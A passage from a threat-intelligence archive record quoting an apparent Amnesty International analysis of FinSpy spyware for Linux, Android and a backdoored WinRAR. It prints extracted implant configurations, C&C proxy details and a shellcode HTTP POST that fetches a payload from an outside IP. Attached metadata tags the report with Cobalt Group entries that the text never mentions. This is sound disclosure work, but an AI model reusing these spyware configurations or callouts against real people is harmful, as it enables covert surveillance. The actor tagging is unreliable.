“eDonkey”,\r\n        “kazaa”,\r\n        “Kazaa”,\r\n        “FrostWire”,\r\n        “LimeWire”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “VoIP”,\r\n      “list”: [\r\n        “CGStarter”,\r\n        “X-Lite”,\r\n        “Gizmo5”,\r\n        “Mercuro”,\r\n        “Mercuro IMS Client”,\r\n        “ts3client_win32”,\r\n        “TeamSpeak 3”,\r\n        “Zfone”,\r\n        “Zfone Control Panel”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeConfigTargetPort”: 443,\r\n  “TlvTypeRequestID”: 0,\r\n  “0x804140”: 2048,\r\n  “TlvTypeVersion”: 0,\r\n  “TlvTypeUserID”: 1000,\r\n  “TlvTypeConfigAutoRemovalDateTime”: “0000000000000000”,\r\n  “TlvTypeTrojanUID”: 229643403,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 13 of 17\n\n“TlvTypeConfigTargetProxy”: [\r\n    “185.25.50.[REDACTED]”,\r\n    “103.11.67.[REDACTED]”\r\n  ],\r\n  “TlvTypeConfigFileTransferSpeed”: 1024,\r\n  “0x807c30”: 0,\r\n  “TlvTypeConfigTargetHeartbeatInterval”: 40000,\r\n  “TlvTypeConfigActiveHiding”: 0\r\n}\r\nRelated Sample\r\nAnother Linux Sample was found on VirusTotal during the investigation\r\nbd1b8bc046dbf19f8c9bbf9398fdbc47c777e1d9e6d9ff1787ada05ed75c1b12. It was first uploaded on VirusTotal in 2014.\r\nFinSpy for Android\r\nThe file “WIFI.apk” identified on 158.69.105.207 (sha256:\r\n854774a198db490a1ae9f06d5da5fe6a1f683bf3d7186e56776516f982d41ad3) is an Android version of the FinSpy spyware.\r\nObfuscation\r\nThe sample employs multiple layers of obfuscation:\r\nJava method names are obfuscated, with names such as iIiOi11OIOOl01O.\r\nStrings are encoded.\r\nControl flow graph is broken by the heavy use of threads and IPC.\r\nActual code is littered with dummy calls.\r\nStrings are obfuscated as XOR’ed byte arrays. The key is provided to the function. This obfuscation technique was not\r\nobserved in previously publicly analyzed versions of FinSpy for Android.\r\nLocal socket address generation\r\nFinSpy for Android uses Unix sockets to communicate between threads. The local socket address is generated by hashing\r\nthe values of the following system properties:\r\nproduct.model\r\nproduct.brand\r\nproduct.name\r\nproduct.device\r\nproduct.manufacturer\r\nbuild.fingerprint\r\nA utility method meant to encode data and generate local socket address uses the timestamp 1540483477 corresponding to\r\nThu 25 October 2018 16:04:37 UTC.\r\nConfiguration\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 14 of 17\n\nAll the previously publicly analyzed samples of FinSpy for Android stored the configuration within the APK file metadata.\r\nThis sample instead embeds the configuration directly in the Dex file, using the same Type Length Value found in previous\r\nAndroid versions.\r\nFunction locating the DEX file path to extract configuration\r\nFollowing is the extracted configuration for this sample:\r\nTlvTypeRequestID : 0\r\nTlvTypeMobileTargetUID : 0\r\nTlvTypeVersion : 0\r\nTlvTypeMobileTargetID : WIFI\r\nTlvTypeMobileTargetHeartbeatInterval : 120\r\n0x849830 : 0\r\nTlvTypeMobileTargetPositioning : ‘\\x82\\x87\\x86\\x81\\x83’\r\n0x846b30 : 1\r\nTlvTypeConfigTargetProxy : [‘185.25.50.[REDACTED]’, ‘103.11.67.[REDACTED]’]\r\nTlvTypeConfigTargetPort : 443\r\nTlvTypeConfigSMSPhoneNumber : [REDACTED]\r\nTlvTypeMobileTrojanID : WIFI\r\nTlvTypeMobileTrojanUID : 229643516\r\nTlvTypeUserID : 1000\r\nTlvTypeTrojanMaxInfections : 9\r\nTlvTypeConfigMobileAutoRemovalDateTime : 0\r\nTlvTypeConfigAutoRemovalIfNoProxy : 168\r\nTlvTypeMobileTargetHeartbeatEvents : 173\r\nTlvTypeMobileTargetHeartbeatRestrictions : 208\r\nTlvTypeMobileTargetLocationChangedRange : 0\r\nTlvTypeInstalledModules : {‘data’:\r\n‘\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x\r\n‘logging’: False, ‘spycall’: False, ‘call_interception’: False, ‘sms’: True, ‘address_book’: True, ‘tracking’: True,\r\n‘phone_logs’: True}\r\nTlvTypeMobileTrackingConfigRaw :\r\n‘V\\x00\\x00\\x00\\xa03E\\x00\\x0c\\x00\\x00\\x00@AE\\x00\\xe8\\x03\\x00\\x00\\x0c\\x00\\x00\\x00@@E\\x00,\\x01\\x00\\x00\\x0c\\x00\\x00\\x00@DE\\x00\\xe8\\x03\\x0\r\n0x544090 :\r\n‘\\\\x00\\x00\\x00\\xa0@T\\x00\\x0c\\x00\\x00\\x00@D\\xfe\\x00P\\x00\\x00\\x00\\t\\x00\\x00\\x000C\\xfe\\x00\\x01\\x0c\\x00\\x00\\x00@F\\xfe\\x00(\\x00\\x00\\x00\\x0c\\x0\r\n0x534090 :\r\n‘S\\x00\\x00\\x00\\xa0AS\\x00\\x0c\\x00\\x00\\x00@D\\xfe\\x00P\\x00\\x00\\x00\\t\\x00\\x00\\x000C\\xfe\\x00\\x01\\x0c\\x00\\x00\\x00@F\\xfe\\x00(\\x00\\x00\\x00\\x0c\\x0\r\n0x550190 : ‘\\x14\\x00\\x00\\x00\\xa0\\x02U\\x00\\x0c\\x00\\x00\\x00@B\\xfe\\x00\\x11+\\x00\\x00’\r\n0x562090 :\r\n‘;\\x00\\x00\\x00\\xa0!V\\x00\\t\\x00\\x00\\x000#V\\x00\\x01\\t\\x00\\x00\\x000%V\\x00\\x01\\t\\x00\\x00\\x000$V\\x00\\x01\\x0c\\x00\\x00\\x00@”V\\x00\\x00\\x00\\x00\\xf\r\n0x570190 : ‘\r\n\\x00\\x00\\x00\\xa0\\x02W\\x00\\x0c\\x00\\x00\\x00@B\\xfe\\x00\\x11+\\x00\\x00\\x0c\\x00\\x00\\x00@\\x03W\\x00\\x00\\x00\\x00\\xff’\r\nTlvTypeEncryption : b”B-P\u0026=YwCS[DJ\\3\\x0e)^^’@@\\x083″\r\nEmergency Reconfiguration\r\nFinSpy can be reconfigured via SMS, through the Java method org.xmlpush.v3.q.c.a(). When an SMS corresponding to\r\nTlvTypeMobileTargetEmergencyConfig is received, FinSpy reconfigures itself by parsing the received payload. The\r\nfollowing attributes can be reconfigured:\r\nTlvTypeConfigTargetPort: port number for the C\u0026C proxy.\r\nTlvTypeConfigSMSPhoneNumber: phone number for SMS based C\u0026C communications.\r\nTlvTypeMobileTrojanID: unknown purpose.\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 15 of 17\n\nTlvTypeMobileTrojanUID: unknown purpose.\r\nTlvTypeUserID: unknown purpose.\r\nTlvTypeTrojanMaxInfections: unknown purpose.\r\nTlvTypeConfigMobileAutoRemovalDateTime: implant self-destruction time.\r\nTlvTypeConfigAutoRemovalIfNoProxy: implant self-destruct if C\u0026C proxy is unavailable\r\nTlvTypeMobileTargetHeartbeatRestrictions: conditions to avoid callbacks\r\nTlvTypeMobileTargetHeartbeatEvents: events to trigger callbacks to the C\u0026C\r\nTlvTypeMobileTargetLocationChangedRange: trigger updates based on location changes\r\nTlvTypeInstalledModules: list of implant features and their configuration (SMS log, call log, etc.)\r\nand other unknown parameters\r\nNew TLV types\r\nFinSpy stores its configuration and communicates with the C\u0026C server in a specific format called TLV devised by FinFisher\r\ndevelopers in early versions. It stores first the size of the data, then an identifier for the type of data and then the data. This\r\nformat was originally identified in a 2012 report by TrustWave. In this latest version new TLV values are introduced,\r\nincluding:\r\nTimeline\r\nThe certificate used to sign this application (sha256: 7C6E4F2E84EBAA8D25040F63D840E14F6F822125) was issued in\r\nMay 2017, but the APK file was created on the 23rd of October 2019 according to the timestamp of the APK.\r\nBackdoored WinRAR: FinSpy for Windows\r\nThe last sample identified (bb8c0e477512adab1db26eb77fe10dadbc5dcbf8e94569061c7199ca4626a420 wrar571.exe) is a\r\nbackdoored version of the WinRAR software.\r\nThe file is a Self-extracting WinRAR archive, the code of the function __security_check_cookie was patched to redirect to\r\nan obfuscated shellcode. The shellcode is doing an HTTP POST request to get a final payload from the IP 207.244.95[.]223:\r\nPOST hxxp://207.244.95.223/docs/attachment.php?attachmentid=ce9de8c78b1053b5b3c1ad7887ddf53d\u0026d=\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.\r\nProxy-Connection: Keep-Alive\r\nContent-Length: 16\r\nHost: 207.244.95.223\r\nThe shellcode then decrypts the payloads and run it in memory. We could not retrieve the payload during the investigation,\r\nbut we expect it to download the next stages of FinSpy for Windows.\r\nThe extracted WinRAR program 5.71 was released in April 2019. the backdoor was thus generated between April and\r\nSeptember 2019.\r\nIndicators of Compromise\r\nIndicators of Compromise and scripts are available here.\r\nGet in touch\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 16 of 17\n\nIf you received any suspicious email like those we described in this report, or other forms of suspected targeted attack, you\r\ncan contact us at:\r\nAcknowledgements\r\nSpecial thanks to Esther Onfroy and to Maciek Kotowicz for their contributions to this report.\r\nSource: https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 17 of 17",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/"
	],
	"report_names": [
		"german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434807,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.pdf",
		"text": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.txt",
		"img": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.jpg"
	}
}